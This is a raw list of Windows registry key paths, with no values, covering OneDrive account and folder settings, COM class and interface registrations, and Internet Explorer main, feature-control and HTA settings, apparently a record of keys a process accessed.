HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\OneDrive
HKEY_LOCAL_MACHINE\Software\Microsoft\OneDrive
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\OneDrive\CurrentVersionPath
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient
HKEY_CURRENT_USER\Software\Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\AppID\FileCoAuth.exe
HKEY_LOCAL_MACHINE\Software\Classes\AppID\FileCoAuth.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_CURRENT_USER\Software\Classes\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{07CA83F0-DF06-4E67-89DD-E80924A49512}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0827D883-485C-4D62-BA2C-A332DBF3D4B0}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{389510B7-9E58-40D7-98BF-60B911CB0EA9}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\TreatAs
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\(Default)
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\AppID
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\LocalServer
HKEY_CURRENT_USER\Software\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\MainAccount
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\UserFolder
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\cid
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\DisplayName
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\UserEmail
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\Business
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\SharePointOnPrem
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\EdpManaged
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\RootAddedToFavorites
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\TenantAddedToFavorites
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\HasMadeFirstUpload
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\IsUpgradeAvailable
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\CrashDetectionKey
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ForceLogUpload
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\EnableADALForSilentBusinessConfig
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LastKnownCloudFilesEnabled
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\FirstRunSignInOrigin
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ExpressSignInCompletedState
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LatestSignInStack
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\WamWebAccountId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthAccountId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthUnrecoverableFailureTimeStamp
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthUnrecoverableFailureTag
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneAuthClientIdUpperCase
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\AuthenticationURLs
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\Tenants
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\OneDriveDeviceId
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\LastShutdownReason
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\Accounts\Personal\ScopeIdToMountPointPathCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\OneDrive
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\DisablePersonalSync
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\PreSignInRampOverrides
HKEY_CURRENT_USER\Software\Microsoft\OneDrive\PreSignInSettingsOverrides
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Hta
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Hta
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Hta
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Hta
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URI_DISABLECACHE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
